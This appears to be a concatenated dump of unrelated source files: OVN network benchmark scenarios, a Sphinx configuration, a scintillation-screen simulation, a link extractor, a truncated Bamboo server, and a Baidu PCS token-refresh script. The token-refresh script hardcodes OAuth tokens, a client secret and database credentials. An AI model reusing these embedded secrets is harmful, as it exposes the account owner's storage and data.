ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
return ovn_nbctl.lswitch_list()
@atomic.action_timer("ovn.delete_lswitch")
def _delete_lswitch(self, lswitches):
print("delete lswitch")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
ovn_nbctl.lswitch_del(lswitch["name"])
ovn_nbctl.flush()
def _get_or_create_lswitch(self, lswitch_create_args=None):
pass
@atomic.action_timer("ovn.create_lport")
def _create_lports(self, lswitch, lport_create_args = [], lport_amount=1,
lport_ip_shift = 1):
LOG.info("create %d lports on lswitch %s" % \
(lport_amount, lswitch["name"]))
self.RESOURCE_NAME_FORMAT = "lpXXXXXX_XXXXXX"
batch = lport_create_args.get("batch", lport_amount)
port_security = lport_create_args.get("port_security", True)
LOG.info("Create lports method: %s" % self.install_method)
network_cidr = lswitch.get("cidr", None)
ip_addrs = None
if network_cidr:
end_ip = network_cidr.ip + lport_amount + lport_ip_shift
if not end_ip in network_cidr:
message = _("Network %s's size is not big enough for %d lports.")
raise exceptions.InvalidConfigException(
message % (network_cidr, lport_amount))
ip_addrs = netaddr.iter_iprange(network_cidr.ip + lport_ip_shift,
network_cidr.last)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
base_mac = [i[:2] for i in self.task["uuid"].split('-')]
base_mac[0] = str(hex(int(base_mac[0], 16) & 254))
base_mac[3:] = ['00']*3
flush_count = batch
lports = []
for i in range(lport_amount):
ip = str(next(ip_addrs)) if ip_addrs else ""
if len(ip):
name = "lp_%s" % ip
else:
name = self.generate_random_name()
mac = utils.get_random_mac(base_mac)
ip_mask = '{}/{}'.format(ip, network_cidr.prefixlen)
lport = ovn_nbctl.lswitch_port_add(lswitch["name"], name, mac,
ip_mask)
ovn_nbctl.lport_set_addresses(name, [mac, ip])
if port_security:
ovn_nbctl.lport_set_port_security(name, mac)
lports.append(lport)
flush_count -= 1
if flush_count < 1:
ovn_nbctl.flush()
flush_count = batch
ovn_nbctl.flush() # ensure all commands be run
ovn_nbctl.enable_batch_mode(False)
return lports
@atomic.action_timer("ovn.delete_lport")
def _delete_lport(self, lports):
print("delete lport")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lport in lports:
ovn_nbctl.lport_del(lport["name"])
ovn_nbctl.flush()
@atomic.action_timer("ovn.list_lports")
def _list_lports(self, lswitches):
print("list lports")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
LOG.info("list lports on lswitch %s" % lswitch["name"])
ovn_nbctl.lport_list(lswitch["name"])
@atomic.optional_action_timer("ovn.create_acl")
def _create_acl(self, lswitch, lports, acl_create_args, acls_per_port):
sw = lswitch["name"]
LOG.info("create %d ACLs on lswitch %s" % (acls_per_port, sw))
direction = acl_create_args.get("direction", "to-lport")
priority = acl_create_args.get("priority", 1000)
action = acl_create_args.get("action", "allow")
address_set = acl_create_args.get("address_set", "")
'''
match template: {
"direction" : "<inport/outport>",
"lport" : "<swicth port>",
"address_set" : "<address_set id>"
"l4_port" : "<l4 port number>",
}
'''
match_template = acl_create_args.get("match",
"%(direction)s == %(lport)s && \
ip4 && udp && udp.src == %(l4_port)s")
if direction == "from-lport":
p = "inport"
else:
p = "outport"
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lport in lports:
for i in range(acls_per_port):
match = match_template % { 'direction' : p,
'lport' : lport["name"],
'address_set' : address_set,
'l4_port' : 100 + i }
ovn_nbctl.acl_add(sw, direction, priority, match, action)
ovn_nbctl.flush()
@atomic.action_timer("ovn.list_acl")
def _list_acl(self, lswitches):
LOG.info("list ACLs")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
LOG.info("list ACLs on lswitch %s" % lswitch["name"])
ovn_nbctl.acl_list(lswitch["name"])
@atomic.action_timer("ovn.delete_all_acls")
def _delete_all_acls_in_lswitches(self, lswitches):
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(True)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
self._delete_acls(lswitch)
ovn_nbctl.flush()
def _delete_acls(self, lswitch, direction=None, priority=None,
match=None, flush=False):
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
LOG.info("delete ACLs on lswitch %s" % lswitch["name"])
ovn_nbctl.acl_del(lswitch["name"], direction, priority, match)
if flush:
ovn_nbctl.flush()
@atomic.action_timer("ovn_network.create_routers")
def _create_routers(self, router_create_args):
LOG.info("Create Logical routers")
return super(OvnScenario, self)._create_routers(router_create_args)
@atomic.action_timer("ovn_network.delete_routers")
def _delete_routers(self):
LOG.info("Delete Logical routers")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lrouter in ovn_nbctl.lrouter_list():
ovn_nbctl.lrouter_del(lrouter["name"])
@atomic.action_timer("ovn_network.connect_network_to_router")
def _connect_networks_to_routers(self, lnetworks, lrouters, networks_per_router):
super(OvnScenario, self)._connect_networks_to_routers(lnetworks,
lrouters,
networks_per_router)
@atomic.action_timer("ovn_network.create_phynet")
def _create_phynet(self, lswitches, physnet, batch):
LOG.info("Create phynet method: %s" % self.install_method)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
flush_count = batch
for lswitch in lswitches:
network = lswitch["name"]
port = "provnet-%s" % network
ovn_nbctl.lswitch_port_add(network, port)
ovn_nbctl.lport_set_addresses(port, ["unknown"])
ovn_nbctl.lport_set_type(port, "localnet")
ovn_nbctl.lport_set_options(port, "network_name=%s" % physnet)
flush_count -= 1
if flush_count < 1:
ovn_nbctl.flush()
flush_count = batch
ovn_nbctl.flush()
# NOTE(huikang): num_networks overides the "amount" in network_create_args
def _create_networks(self, network_create_args, num_networks=-1):
physnet = network_create_args.get("physical_network", None)
lswitches = self._create_lswitches(network_create_args, num_networks)
batch = network_create_args.get("batch", len(lswitches))
if physnet != None:
self._create_phynet(lswitches, physnet, batch)
return lswitches
def _bind_ports_and_wait(self, lports, sandboxes, port_bind_args):
port_bind_args = port_bind_args or {}
wait_up = port_bind_args.get("wait_up", False)
# "wait_sync" takes effect only if wait_up is True.
# By default we wait for all HVs catching up with the change.
wait_sync = port_bind_args.get("wait_sync", "hv")
if wait_sync.lower() not in ['hv', 'sb', 'none']:
raise exceptions.InvalidConfigException(_(
"Unknown value for wait_sync: %s. "
"Only 'hv', 'sb' and 'none' are allowed.") % wait_sync)
LOG.info("Bind lports method: %s" % self.install_method)
self._bind_ports(lports, sandboxes, port_bind_args)
if wait_up:
self._wait_up_port(lports, wait_sync)
def _bind_ovs_internal_vm(self, lport, sandbox, ovs_ssh):
port_name = lport["name"]
port_mac = lport["mac"]
port_ip = lport["ip"]
# TODO: some containers don't have ethtool installed
if not sandbox["host_container"]:
# Disable tx offloading on the port
ovs_ssh.run('ethtool -K {p} tx off &> /dev/null'.format(p=port_name))
ovs_ssh.run('ip netns add {p}'.format(p=port_name))
ovs_ssh.run('ip link set {p} netns {p}'.format(p=port_name))
ovs_ssh.run('ip netns exec {p} ip link set {p} address {m}'.format(
p=port_name, m=port_mac)
)
ovs_ssh.run('ip netns exec {p} ip addr add {ip} dev {p}'.format(
p=port_name, ip=port_ip)
)
ovs_ssh.run('ip netns exec {p} ip link set {p} up'.format(
p=port_name)
)
# Add route for multicast traffic
ovs_ssh.run('ip netns exec {p} ip route add 224/4 dev {p}'.format(
p=port_name)
)
# Store the port in the context so we can use its information later
# on or at cleanup
self.context["ovs-internal-ports"][port_name] = (lport, sandbox)
def _delete_ovs_internal_vm(self, port_name, ovs_ssh, ovs_vsctl):
ovs_vsctl.del_port(port_name)
ovs_ssh.run('ip netns del {p}'.format(p=port_name))
def _flush_ovs_internal_ports(self, sandbox):
stdout = StringIO()
host_container = sandbox["host_container"]
sb_name = sandbox["name"]
farm = sandbox["farm"]
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method, host_container)
ovs_vsctl.run("find interface type=internal", ["--bare", "--columns", "name"], stdout=stdout)
output = stdout.getvalue()
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method, host_container)
for name in list(filter(None, output.splitlines())):
if "lp" not in name:
continue
self._delete_ovs_internal_vm(name, ovs_ssh, ovs_vsctl)
def _cleanup_ovs_internal_ports(self, sandboxes):
conns = {}
for sandbox in sandboxes:
sb_name = sandbox["name"]
farm = sandbox["farm"]
host_container = sandbox["host_container"]
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method,
host_container)
ovs_ssh.enable_batch_mode()
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
host_container)
ovs_vsctl.enable_batch_mode()
conns[sb_name] = (ovs_ssh, ovs_vsctl)
for _, (lport, sandbox) in self.context["ovs-internal-ports"].items():
sb_name = sandbox["name"]
(ovs_ssh, ovs_vsctl) = conns[sb_name]
self._delete_ovs_internal_vm(lport["name"], ovs_ssh, ovs_vsctl)
for _, (ovs_ssh, ovs_vsctl) in conns.items():
ovs_vsctl.flush()
ovs_ssh.flush()
@atomic.action_timer("ovn_network.bind_port")
def _bind_ports(self, lports, sandboxes, port_bind_args):
internal = port_bind_args.get("internal", False)
sandbox_num = len(sandboxes)
lport_num = len(lports)
lport_per_sandbox = int((lport_num + sandbox_num - 1) / sandbox_num)
if (len(lports) < len(sandboxes)):
for lport in lports:
sandbox_data = random.choice(sandboxes)
farm = sandbox_data['farm']
sandbox = sandbox_data['name']
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
sandbox_data['host_container'])
ovs_vsctl.enable_batch_mode()
port_name = lport["name"]
port_mac = lport["mac"]
port_ip = lport["ip"]
LOG.info("bind %s to %s on %s" % (port_name, sandbox, farm))
ovs_vsctl.add_port('br-int', port_name, internal=internal)
ovs_vsctl.db_set('Interface', port_name,
('external_ids', {"iface-id": port_name,
"iface-status": "active"}),
('admin_state', 'up'))
ovs_vsctl.flush()
# If it's an internal port create a "fake vm"
if internal:
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
self._bind_ovs_internal_vm(lport, sandbox_data, ovs_ssh)
ovs_ssh.flush()
else:
j = 0
for i in range(0, len(lports), lport_per_sandbox):
lport_slice = lports[i:i+lport_per_sandbox]
sandbox = sandboxes[j]["name"]
farm = sandboxes[j]["farm"]
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
sandboxes[j]["host_container"])
ovs_vsctl.enable_batch_mode()
for index, lport in enumerate(lport_slice):
port_name = lport["name"]
LOG.info("bind %s to %s on %s" % (port_name, sandbox, farm))
ovs_vsctl.add_port('br-int', port_name, internal=internal)
ovs_vsctl.db_set('Interface', port_name,
('external_ids', {"iface-id":port_name,
"iface-status":"active"}),
('admin_state', 'up'))
if index % 400 == 0:
ovs_vsctl.flush()
ovs_vsctl.flush()
# If it's an internal port create a "fake vm"
if internal:
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.enable_batch_mode()
for index, lport in enumerate(lport_slice):
self._bind_ovs_internal_vm(lport, sandboxes[j], ovs_ssh)
if index % 200 == 0:
ovs_ssh.flush()
ovs_ssh.flush()
j += 1
@atomic.action_timer("ovn_network.wait_port_up")
def _wait_up_port(self, lports, wait_sync):
LOG.info("wait port up. sync: %s" % wait_sync)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(True)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for index, lport in enumerate(lports):
ovn_nbctl.wait_until('Logical_Switch_Port', lport["name"], ('up', 'true'))
if index % 400 == 0:
ovn_nbctl.flush()
if wait_sync != "none":
ovn_nbctl.sync(wait_sync)
@atomic.action_timer("ovn_network.list_oflow_count_for_sandboxes")
def _list_oflow_count_for_sandboxes(self, sandboxes,
sandbox_args):
oflow_data = []
for sandbox in sandboxes:
sandbox_name = sandbox["name"]
farm = sandbox["farm"]
host_container = sandbox_name["host_container"]
ovs_ofctl = self.farm_clients(farm, "ovs-ofctl")
ovs_ofctl.set_sandbox(sandbox_name, self.install_method,
host_container)
bridge = sandbox_args.get('bridge', 'br-int')
lflow_count = ovs_ofctl.dump_flows(bridge)
LOG.debug('openflow count on %s is %s' % (sandbox_name, lflow_count))
oflow_data.append([sandbox_name, lflow_count])
# Leverage additive plot as each sandbox has just one openflow count.
additive_oflow_data = {
"title": "Openflow count on each sandbox in StackedArea",
"description": "Openflow count on each sandbox",
"chart_plugin": "StackedArea", "data": oflow_data
}
self.add_output(additive_oflow_data)
def _create_address_set(self, set_name, address_list):
LOG.info("create %s address_set [%s]" % (set_name, address_list))
name = "name=\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.create("Address_Set", name, ('addresses', addr_list))
ovn_nbctl.flush()
def _address_set_add_addrs(self, set_name, address_list):
LOG.info("add [%s] to address_set %s" % (address_list, set_name))
name = "\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.add("Address_Set", name, ('addresses', ' ', addr_list))
ovn_nbctl.flush()
def _address_set_remove_addrs(self, set_name, address_list):
LOG.info("remove [%s] from address_set %s" % (address_list, set_name))
name = "\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.remove("Address_Set", name, ('addresses', ' ', addr_list))
ovn_nbctl.flush()
def _list_address_set(self):
stdout = StringIO()
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
ovn_nbctl.run("list address_set", ["--bare", "--columns", "name"], stdout=stdout)
ovn_nbctl.flush()
output = stdout.getvalue()
return output.splitlines()
def _remove_address_set(self, set_name):
LOG.info("remove %s address_set" % set_name)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.destroy("Address_Set", set_name)
ovn_nbctl.flush()
def _get_address_set(self, set_name):
LOG.info("get %s address_set" % set_name)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
return ovn_nbctl.get("Address_Set", set_name, 'addresses')
| apache-2.0 | 7,730,396,663,554,991,000 | 41.743243 | 101 | 0.561769 | false |
andrenarchy/krypy-debian | docs/conf.py | 1 | 7810 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# KryPy documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 21 17:54:43 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.mathjax']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'KryPy'
copyright = u'2013, André Gaul'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
autoclass_content = 'both'
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'nature'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'KryPydoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'KryPy.tex', 'KryPy Documentation',
'André Gaul', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'krypy', 'KryPy Documentation',
['André Gaul'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'KryPy', 'KryPy Documentation',
'André Gaul', 'KryPy', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| mit | -3,065,985,378,435,863,600 | 30.991803 | 83 | 0.702793 | false |
krosenfeld/scatterbrane | docs/_code/time_variability.py | 1 | 3849 | '''
Generate a time series incorporating the motion of the screen across the source.
This script may take a long time to run. I suggest you read through it first and
adjust the num_samples variable to check out its performance.
'''
import numpy as np
from scipy.ndimage import imread
import time
import matplotlib.pyplot as plt
from palettable.cubehelix import jim_special_16
cmap = jim_special_16.mpl_colormap
plt.rcParams['image.origin'] = 'lower'
plt.rcParams['patch.edgecolor'] = 'white'
plt.rcParams['lines.linewidth'] = 2
from scatterbrane import Brane,utilities
# set up logger
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
# import our source image and covert it to gray scale
src_file = 'source_images/nh_01_stern_05_pluto_hazenew2.square.jpg'
rgb = imread(src_file)[::-1]
I = (np.array([0.2989,0.5870,0.1140])[np.newaxis,np.newaxis,:]*rgb).sum(axis=-1)
I *= np.pi/I.sum()
# make up some scale for our image.
write_figs = False
wavelength=1e-3
FOV = 90.
dx = FOV/I.shape[0]
# initialize the scattering screen @ 0.87mm
b = Brane(I,dx,wavelength=0.87e-3,nphi=(2**12,2**14),anisotropy=1,pa=None,r_inner=50,live_dangerously=True)
# estimate the time resolution of our simulation assuming some screen velocity.
screen_velocity = 200. #km/s
fs = screen_velocity/(b.screen_dx*b.ips) # Hz
num_samples = b.nphi[1]/b.ips - b.nx # try num_samples = 100 for testing porpoises.
logger.info('Number of samples: {0:g}'.format(num_samples))
logger.info('Sampling interval: {0:g}s'.format(1./fs))
logger.info('Time coverage: {0:g} days'.format(num_samples/fs/(3600.*24.)))
# generate the screen (this takes a while)
logger.info('generating screen...')
tic = time.time()
b.generatePhases()
logger.info('took {0:g}s'.format(time.time()-tic))
# generate time series (this takes a while)
logger.info('generating time series...')
fluxes = []
frames = []
tic = time.time()
for i in range(num_samples):
# update source image to include a sinusoidal flux modulation
b.setModel(I*(1. - 0.4*np.sin(2*np.pi*i/(2*num_samples))), dx) # comment out to speedup
b.scatter(move_pix=i*b.ips)
fluxes.append(b.iss.sum())
frames.append(b.iss)
logger.info('took {0:g}s'.format(time.time()-tic))
# 1962.92s
# make figures
fig_file = '../_static/time_variability/'
extent=b.dx*b.nx//2*np.array([1,-1,-1,1])
plt.figure()
plt.subplot(121)
isrc_smooth = utilities.smoothImage(b.isrc,b.dx,2.*b.dx)
plt.imshow(isrc_smooth,extent=extent,cmap=cmap)
plt.xlabel('$\Delta\\alpha$ [$\mu$as]'); plt.ylabel('$\Delta\delta$ [$\mu$as]')
plt.subplot(122)
iss_smooth = utilities.smoothImage(b.iss,b.dx,2.*b.dx)
plt.imshow(iss_smooth,extent=extent,cmap=cmap)
plt.gca().set_yticklabels(10*['']); plt.gca().set_xticklabels(10*[''])
if write_figs: plt.savefig(fig_file+'/iss.png',bbox_inches='tight')
plt.figure()
t = 1./fs*np.arange(len(fluxes))/3600.
plt.plot(t,fluxes,color='#377EB8')
plt.xlabel('time [hr]')
plt.ylabel('flux [Jy]')
plt.xlim([0,t.max()])
plt.grid()
if write_figs: plt.savefig(fig_file+'/flux.png',bbox_inches='tight')
# and a movie
import matplotlib.animation as animation
i = 0
def updatefig(*args):
global i
i = (i + 1) % num_samples
im.set_array(utilities.smoothImage(frames[i],b.dx,2*b.dx))
return im
plt.show()
fig = plt.figure(figsize=(8,6))
im = plt.imshow(utilities.smoothImage(frames[0],b.dx,2*b.dx), cmap=cmap, animated=True,
extent=extent, interpolation=None)
plt.xlabel('$\Delta\\alpha$ [$\mu$as]')
plt.ylabel('$\Delta\delta$ [$\mu$as]')
ani = animation.FuncAnimation(fig, updatefig, interval=50, blit=False, frames=int(1000))
Writer = animation.writers['ffmpeg']
writer = Writer(fps=15, metadata=dict(artist='Katherine Rosenfeld'), bitrate=1800)
if write_figs:
logger.info('writing movie!')
ani.save('mov.mp4',writer=writer)
plt.close()
else:
plt.show()
| mit | -1,363,312,966,128,243,000 | 32.763158 | 107 | 0.704858 | false |
matrixorz/justpic | justpic/etc/pcstool.py | 1 | 1581 | {"expires_in":2592000,"refresh_token":"22.ca7aeff542c491ee0c9de8a3010a9de4.315360000.1724417263.3875775130-1056026","access_token":"21.8bdf77c07a392aea779d571a24903d45.2592000.1411649263.3875775130-1056026","session_secret":"8ddef6d7ab2a0b36034c53a46bcbb6c0","session_key":"9mnRfHBbgiKJcCaPaY1v1Qjo2\/VryC6ZM+X+sorRrQ6C8hWQeryRbEXcZmR2RyHGaDPD8yD8\/LGm+jHuvnVhx6fV0IO5EEJGmQ==","scope":"basic netdisk"}
# "refresh_token":"22.ca7aeff542c491ee0c9de8a3010a9de4.315360000.1724417263.3875775130-1056026"
# "access_token":"21.8bdf77c07a392aea779d571a24903d45.2592000.1411649263.3875775130-1056026"
client_id='oA8jMPTjA8yrtaGsc2i5HHdx'
client_secret='kas6A0XFr7uArRnXL4Da0GCvyxRqRiWw'
#get the foever token ?
import MySQLdb
db = MySQLdb.connect("localhost","david","david","picturetoken")
cursor=db.cursor()
cursor.execute("select * from picturetoken")
rs=cursor.fetchone()
# cursor.close
print rs
print rs[2]
refresh_token=rs[2]
from baidupcs.tools import get_new_access_token
response=get_new_access_token(refresh_token,client_id,client_secret)
access_token=response.json()['access_token']
refresh_token=response.json()['refresh_token']
print access_token
print refresh_token
print type(access_token)
# cursor=db.cursor()
# print
# add_salary = """insert into picturetoken(access_token, refresh_token) values(%s,%s)""" ,(access_token,refresh_token)
# print add_salary
cursor.execute("delete from picturetoken")
cursor.execute( """insert into picturetoken(access_token, refresh_token) values(%s,%s)""" ,(str(access_token),str(refresh_token)))
cursor.close()
db.commit()
db.close()
| mit | 5,203,383,678,631,350,000 | 41.72973 | 402 | 0.794434 | false |
surajsinghbisht054/Information_Gathering_Python_Web_Scraping_Scripts | html_link_extractor/link_re.py | 1 | 1087 | #!/usr/bin/python
##################################################
######## Please Don't Remove Author Name #########
############### Thanks ###########################
##################################################
#
#
__author__='''
Suraj Singh
[email protected]
https://bitforestinfo.blogspot.in/
'''
# Import Module
import urllib.request, urllib.error, urllib.parse
import sys
import re
if len(sys.argv)==1:
print("[*] Please Provide Domain Name:\n Usages: python link_re.py www.examplesite.com\n")
sys.exit(0)
# Retrieve Html Data From Url
def get_html(url):
try:
page = urllib.request.urlopen(url).read()
except Exception as e:
print("[Error Found] ",e)
page=None
return page
html_data=get_html(sys.argv[1])
# Condition
if html_data:
pattern = re.compile('(<a .*?>)') # First, Find all <a > tag
a_tag_captured = pattern.findall(html_data)
for i in a_tag_captured: # Second, Now Find href tag in all tag
href=re.search('href=.*', i[1:-1])
if href: # If Tag Found
print(href.group().split(' ')[0]) # Print Tag
| apache-2.0 | -3,389,522,426,765,960,000 | 24.880952 | 91 | 0.563017 | false |
amwelch-oss/bamboo-pr-feedback | bin/pr_feedback_server.py | 1 | 5276 | #! /usr/bin/env python
import tornado.web
import tornado.httpserver
import tornado.ioloop
import getpass
import requests
import json
import os
import hashlib
import hmac
import argparse
#Since bamboo does not have api tokens you will need to provide a real user's password
# If you don't want to store the password in plaintext in the config file you will
# be prompted for it when the server starts up
bamboo_password = None
def get_config(config_file):
'''
Loads and parses the json config file and returns
a config object
'''
try:
data = json.load(open(config_file))
return data
except ValueError:
